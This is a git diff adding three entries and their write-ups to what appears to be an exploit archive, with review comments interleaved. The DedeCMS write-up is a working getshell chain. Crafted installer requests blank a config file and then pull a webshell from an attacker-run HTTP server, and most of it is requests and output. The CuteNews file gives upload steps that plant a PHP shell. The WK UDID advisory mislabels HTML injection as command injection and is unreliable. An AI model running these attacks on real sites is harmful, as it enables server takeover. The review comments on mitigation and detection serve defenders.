diff --git a/files.csv b/files.csv
index b9e3d10ba..a03cb739b 100755
--- a/files.csv
+++ b/files.csv
@@ -33774,6 +33774,7 @@ id,file,description,date,author,platform,type,port
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
+37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0
37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
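Review bot: The description on the added 37423 row does not match the advisory added in this same commit: `DedeCMS < 5.7-sp1` excludes 5.7-sp1, while platforms/php/webapps/37423.txt states that "dedecms 5.7-sp1 and all old version" are affected. Anyone triaging by this index would treat a 5.7-sp1 install as unaffected, so the range should read `DedeCMS <= 5.7-sp1`. The "Remote File Inclusion" label also looks off, because the write-up describes request variables overwriting installer settings and fetched content being written to disk rather than included. The row also omits the CVE-2015-4553 identifier the advisory carries, which would help correlation with scanner and advisory feeds.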
@@ -33820,6 +33821,7 @@ id,file,description,date,author,platform,type,port
37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
+37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload Vulnerability",2015-07-03,T0x!c,php,webapps,80
37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
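Review bot: The added 37474 row sets the port column to `80`, whereas every other webapps row visible in these hunks uses `0`. If `0` is the convention for "no fixed port", the new row should end in `,php,webapps,0`; if 80 is intentional, the neighbouring web entries are inconsistent with it. Filters built on this column would otherwise group this entry apart from the other web-application rows.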
@@ -33834,3 +33836,4 @@ id,file,description,date,author,platform,type,port
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
+37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
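Review bot: The 37492 row carries the advisory's "Command Inject" title under `ios,webapps`, but the advisory body added in this commit (platforms/ios/webapps/37492.txt) points to a narrower flaw. It gives "Exploitation Technique: Local", places the injection point in the device name setting, says "The html encoding is broken in the send by mail export function", and its fix is to encode the output in the generated HTML; that reads as missing output encoding in the exported mail, not operating-system command execution. The same file also calls the vector "server-side" and mentions an "androidios device account", so its severity text is internally inconsistent. A description such as `WK UDID 1.0.1 iOS - Device Name HTML Injection (Mail Export)` would let readers prioritise the entry correctly, with the original title presumably kept inside the advisory file itself.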
diff --git a/platforms/ios/webapps/37492.txt b/platforms/ios/webapps/37492.txt
new file mode 100755
index 000000000..653e03935
--- /dev/null
+++ b/platforms/ios/webapps/37492.txt
@@ -0,0 +1,163 @@
+Document Title:
+===============
+WK UDID v1.0.1 iOS - Command Inject Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1539
+
+
+Release Date:
+=============
+2015-07-01
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1539
+
+
+Common Vulnerability Scoring System:
+====================================
+5.6
+
+
+Product & Service Introduction:
+===============================
+This app offers the opportunity to read device-specific information from your iPhone, iPad or iPod touch. The desired information can be
+selected and sent via email to a recipient of your choice or it can be copied to the clipboard for later use. You can get information about
+the unique identifier (UDID), the model, the name and the operating system of your device.
+
+(Copy of the Homepage https://itunes.apple.com/us/app/wk-udid/id392624227 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered a local command inject web vulnerability in the official WK UDID v1.0.1 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-07-01: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+WK EDV GmbH
+Product: WK UDID - iOS Mobile Web Application 1.0.1
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A local command inject web vulnerability has been discovered in the official WK UDID v1.0.1 iOS mobile web-application.
+The vulnerability allows to inject malicious script codes to the application-side of the vulnerable mobile app.
+
+The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value
+of the device to compromise the mail function of the wkudid mobile app. The html encoding is broken in the send by mail export function.
+Local attackers are able to manipulate the device name id to compromise the application internal validation in send emails. The attack vector
+of the vulnerability is server-side and the injection point is the device name information settings.
+
+The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
+Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction.
+Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
+compromise the mobile iOS application and connected device components.
+
+Vulnerable Module(s)
+ [+] Device - Settings - Information
+
+Vulnerable Parameter(s)
+ [+] device name
+
+Affected Module(s)
+ [+] WKUDID - Mail
+
+
+Proof of Concept (PoC):
+=======================
+The local command inject web vulnerability can be exploited by local attackers with low privilege device user account and without user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce the vulnerability ...
+1. Start the iOS device
+2. Open the settings module
+3. Change the name to the local command injection payload
+4. Save the settings and start the application wkudid
+5. Send the details by mail
+6. Review the arrival inbox
+7. The execution point is the xml and header location with the device name value
+8. Successful reproduce of the local command inject security vulnerability!
+
+
+PoC Device ID - Email
+
+
Identifier (UDID): FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1
+
Model: iPad
Name: bkm337>"<./[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE!]">%20
+System Name: iPhone OS
System Version: 8.3
Total Memory (RAM): 987.98 MB
+Free Memory: 19.06 MB
Total Storage: 27.19 GB
Free Storage: 0.70 GB
+CPU Frequency: an error occured
Network: WiFi
Wi-Fi: 02:00:00:00:00:00
+IP Address: 192.168.2.104
Carrier: not available
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerable Device name value. Restrict the input and encode the output in the
+vulnerable generated html file. Disallow script code values in the html generated file type to prevent further command injection attacks.
+
+
+Security Risk:
+==============
+The security rsik of the local command inject web vulnerability in the device name value is estimated as medium. (CVSS 5.6)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
diff --git a/platforms/php/webapps/37423.txt b/platforms/php/webapps/37423.txt
new file mode 100755
index 000000000..62e007d8b
--- /dev/null
+++ b/platforms/php/webapps/37423.txt
@@ -0,0 +1,199 @@
+ ==========================
+# Exploit Title: Dedecms variable coverage leads to getshell
+# Date: 26-06-2015
+# Vendor Homepage: http://www.dedecms.com/]
+# Version: dedecms 5.7-sp1 and all old version
+# CVE : CVE-2015-4553
+===========================
+
+
+[CVE-2015-4553]Dedecms variable coverage leads to getshell
+#############################################################################
+#
+# DBAPPSECURITY LIMITED http://www.dbappsecurity.com.cn/
+#
+#############################################################################
+#
+# CVE ID: CVE-2015-4553
+# Subject: Dedecms variable coverage leads to getshell
+# Author: zise
+# Date: 06.17.2015
+#############################################################################
+Introduction:
+========
+dedecms Open source cms
+Extensive application
+
+Influence version
+Newest dedecms 5.7-sp1 and all old version
+
+
+Remote getshell
+Details:
+=======
+After the default installation of dedecms
+Installation directory
+/install/index.php
+or
+/install/index.php.bak
+
+/install/index.php //run iis apache exploit
+/install/index.php.bak //run apache exploit
+
+
+Code analysis
+
+/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb
+
+#############################################################################
+17 $install_demo_name = 'dedev57demo.txt';
+18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
+
+here $install_demo_name and $insLockfile definition
+// echo $install_demo_name; printf dedev57demo.txt
+
+29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
+30 {
+31 foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
+32 }
+
+
+// echo $install_demo_name; printf aaaa
+
+$install_demo_name by variable coverage
+
+The same
+17 $install_demo_name = 'dedev57demo.txt';
+18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
+
+variable coverage
+#############################################################################
+
+
+
+
+GETSHELL Step 1 Clear file contents config_update.php
+#############################################################################
+config_update.php
+13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
+14 $linkHost = 'http://flink.dedecms.com/server_url.php';
+
+In order to obtain the webshell need to control $updateHost
+So the use of variable coverags cleared config_update.php
+
+
+http://192.168.204.135/install/index.php.bak
+?step=11
+&insLockfile=a
+&s_lang=a
+&install_demo_name=../data/admin/config_update.php
+
+index.php.bak
+373 else if($step==11)
+374 {
+375 require_once('../data/admin/config_update.php');
+376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
+377
+378 $sql_content = file_get_contents($rmurl);
+379 $fp = fopen($install_demo_name,'w');
+380 if(fwrite($fp,$sql_content))
+381 echo ' [√] 存在(您可以选择安装进行体验)';
+382 else
+383 echo ' [×] 远程获取失败';
+384 unset($sql_content);
+385 fclose($fp);
+386 exit();
+387 }
+
+###
+HTTP/1.1 200 OK
+Date: Wed, 17 Jun 2015 06:55:23 GMT
+Server: Apache/2.4.12
+X-Powered-By: PHP/5.6.6
+Vary: User-Agent
+Content-Length: 55
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+ [×] 远程获取失败
+ ###
+
+
+
+
+###After execution file 0 byte ~ho~year~####
+2015/06/17 14:55 0 config_update.php
+ 1 file 0 byte
+
+
+
+GETSHELL Step 2
+#############################################################################
+Create local HTTP services
+
+zise:tmp zise$ ifconfig en0
+en0: flags=8863 mtu 1500
+inet 119.253.3.18 netmask 0xffffff00 broadcast
+
+zise:tmp zise$ mkdir "dedecms"
+zise:tmp zise$ cd dedecms/
+zise:dedecms zise$ echo "" > demodata.a.txt
+zise:dedecms zise$ cd ../
+zise:tmp zise$ python -m SimpleHTTPServer
+Serving HTTP on 0.0.0.0 port 8000 ...
+192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
+
+
+####
+http://192.168.204.135/install/index.php.bak
+?step=11
+&insLockfile=a
+&s_lang=a
+&install_demo_name=hello.php
+&updateHost=http://119.253.3.18:8000/
+
+####
+
+HTTP/1.1 200 OK
+Date: Wed, 17 Jun 2015 07:11:18 GMT
+Server: Apache/2.4.12
+X-Powered-By: PHP/5.6.6
+Vary: Accept-Encoding,User-Agent
+Content-Length: 81
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+ [√] 存在(您可以选择安装进行体验)
+
+
+index.php.bak
+373 else if($step==11)
+374 {
+375 require_once('../data/admin/config_update.php');
+376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
+377
+378 $sql_content = file_get_contents($rmurl);
+379 $fp = fopen($install_demo_name,'w');
+380 if(fwrite($fp,$sql_content)) //fwrite websehll
+381 echo ' [√] 存在(您可以选择安装进行体验)';
+382 else
+383 echo ' [×] 远程获取失败';
+384 unset($sql_content);
+385 fclose($fp);
+386 exit();
+387 }
+
+Attack complete
+you webshell
+
+http://192.168.204.135/install/hello.php
+
+
+
+> zise ^_^
+> Security researcher
+
+This is the vulnerability of some web pages
+http://seclists.org/fulldisclosure/2015/Jun/47
\ No newline at end of file
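Review bot: The advisory ends at "Attack complete" without a remediation or detection section, which is the part an operator of an affected site needs. From the quoted installer lines 29-32, the root cause is the loop that assigns every GET/POST/COOKIE key to a variable after the defaults on lines 17-18 are set, combined with the installer (`index.php` / `index.php.bak`) remaining reachable after setup. A closing section along the lines of `Mitigation: remove or deny web access to /install/ (including index.php.bak) after installation, and apply any vendor fix for CVE-2015-4553` would cover it. For log review, the requests shown combine `step=11` with `install_demo_name` or `updateHost` parameters on `/install/index.php*`, and an unexpectedly empty `data/admin/config_update.php` is the on-disk sign described in step 1.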
diff --git a/platforms/php/webapps/37474.txt b/platforms/php/webapps/37474.txt
new file mode 100755
index 000000000..366d4cbf4
--- /dev/null
+++ b/platforms/php/webapps/37474.txt
@@ -0,0 +1,48 @@
+ CuteNews 2.0.3 Remote File Upload Vulnerability
+ =================================================
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : Inj3ct0r.com 0
+1 [+] Support e-mail : submit[at]inj3ct0r.com 1
+0 0
+1 ########################################## 1
+0 I'm T0x!c member from Inj3ct0r Team 1
+1 ########################################## 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+
+
+# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
+# Date: [02/07/2015]
+# Exploit Author: [T0x!c]
+# Facebook: https://www.facebook.com/Dz.pr0s
+# Vendor Homepage: [http://cutephp.com/]
+# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
+# Version: [2.0.3]
+# Tested on: [Windows 7]
+# greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz .....
+==========================================================
+ # Exploit :
+
+Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
+
+ 1 - Sign up for New User
+ 2 - Log In
+ 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
+ 4 - Select Upload Avatar Example: Evil.jpg
+ 5 - use tamper data & Rename File Evil.jpg to Evil.php
+
+-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
+
+6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
+
+ Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
\ No newline at end of file
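Review bot: The write-up lists reproduction steps only and names neither the root cause nor a fix. Step 5 implies the avatar upload keeps the client-supplied `filename` extension, and step 6 shows the result stored under the web-served `uploads/` directory with an `avatar_` prefix. A short remediation note would make this usable for defenders, e.g. `Fix: enforce a server-side allow-list of image extensions and content checks, store avatars under generated names, and disable script execution in uploads/`. The host also switches between `127.0.0.1` and `www.target.com` within the steps, which should be made consistent.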